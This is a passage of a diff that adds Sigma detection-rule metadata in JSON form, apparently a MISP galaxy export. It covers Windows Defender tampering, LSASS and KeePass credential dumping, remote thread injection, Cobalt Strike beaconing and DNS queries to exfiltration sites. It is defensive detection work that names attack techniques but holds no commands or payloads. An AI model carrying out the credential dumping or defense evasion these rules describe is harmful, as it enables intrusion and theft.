[ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction" + }, + { + "description": "Detects triggering of AMSI by Windows Defender.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/09/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_amsi_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected" + }, + { + "description": "Detects disabling Windows Defender threat protection", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_exclusions.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added" + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_exploit_guard_tamper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper" + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "filename": "win_defender_history_delete.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ] + }, + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion" + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_defender_psexec_wmi_asr.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ] + }, + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block" + }, + { + "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/05", + "falsepositive": [ + "Administrator actions" + ], + "filename": "win_defender_tamper_protection_trigger.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", + "value": "Microsoft Defender Tamper Protection Trigger" + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2020/07/28", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_defender_threat.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "value": "WMI Persistence" + }, + { + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_bumblebee.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ] + }, + "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "value": "Bumblebee Remote Thread Creation" + }, + { + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "meta": { + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "creation_date": "2019/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cactustorch.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" + ] + }, + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation" + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "meta": { + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "creation_date": "2018/11/30", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection" + }, + { + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_loadlibrary.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary" + }, + { + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "meta": { + "author": "Timon Hackenjos", + "creation_date": "2022/04/22", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_password_dumper_keepass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", + "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.005" + ] + }, + "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "value": "KeePass Password Dumping" + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Antivirus products" + ], + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ] + }, + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS" + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. Code Injection" + }, + { + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/25", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ] + }, + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation" + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "meta": { + "author": "Perez Diego (@darkquassar), oscd.community", + "creation_date": "2019/10/27", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_remote_thread_source.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "Personal research, statistical analysis", + "https://lolbas-project.github.io", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", + "value": "Suspicious Remote Thread Source" + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_remote_thread_target.yml", + "level": "medium", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_target.yml" + ], + "tags": "No established tags" + }, + "uuid": "f016c716-754a-467f-a39e-63c06f773987", + "value": "Suspicious Remote Thread Target" + }, + { + "description": "Detects a remote thread creation in suspicious target images", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/16", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_susp_targets.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" + ] + }, + "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "value": "Remote Thread Creation in Suspicious Targets" + }, + { + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_ttdinjec.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "value": "Remote Thread Creation Ttdinject.exe Proxy" + }, + { + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "meta": { + "author": "Florian Roth, @0xrawsec", + "creation_date": "2018/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_ads_executable.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS" + }, + { + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "meta": { + "author": "frack113", + "creation_date": "2022/10/22", + "falsepositive": [ + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + ], + "filename": "create_stream_hash_creation_internet_file.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download" + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_hacktool_download.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download" + }, + { + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "meta": { + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_regedit_export_to_ads.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "value": "Exports Registry Key To an Alternate Data Stream" + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_domain_ext_combo.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "value": "Suspicious File Download from File Sharing Domain" + }, + { + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", + "level": "medium", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" + ] + }, + "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "value": "Unusual File Download from File Sharing Domain" + }, + { + "description": "Detects the download of suspicious file type from URLs with IP", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_ip_domains.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/07/11", + "falsepositive": [ + "FP may be caused in legitimate usage of the softwares mentioned above" + ], + "filename": "dns_query_remote_access_software_domains.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", + "value": "Query To Remote Access Software Domain" + }, + { + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Legitimate access to anonfiles.com" + ], + "filename": "dns_query_win_anonymfiles_com.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "065cceea-77ec-4030-9052-fc0affea7110", + "value": "DNS Query for Anonfiles.com Domain" + }, + { + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + ], + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", + "value": "DNS HybridConnectionManager Service Bus" + }, + { + "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_lobas_appinstaller.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "value": "AppInstaller Attempts From URL by DNS" + }, + { + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "value": "Suspicious Cobalt Strike DNS Beaconing" + }, + { + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Mega upload" + ], + "filename": "dns_query_win_mega_nz.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "value": "DNS Query for MEGA.io Upload Domain" + }, + { + "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL).", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": "No established falsepositives", + "filename": "dns_query_win_possible_dns_rebinding.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189" + ] + }, + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", + "value": "Regsvr32 Network Activity - DNS" + }, + { + "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "meta": { + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "creation_date": "2021/07/08", + "falsepositive": [ + "Legitimate usage of ip lookup services such as ipify API" + ], + "filename": "dns_query_win_susp_ipify.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://twitter.com/neonprimetime/status/1436376497980428318", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1590" + ] + }, + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs" + }, + { + "description": "Detect suspicious LDAP request from non-Windows application", + "meta": { + "author": "frack113", + 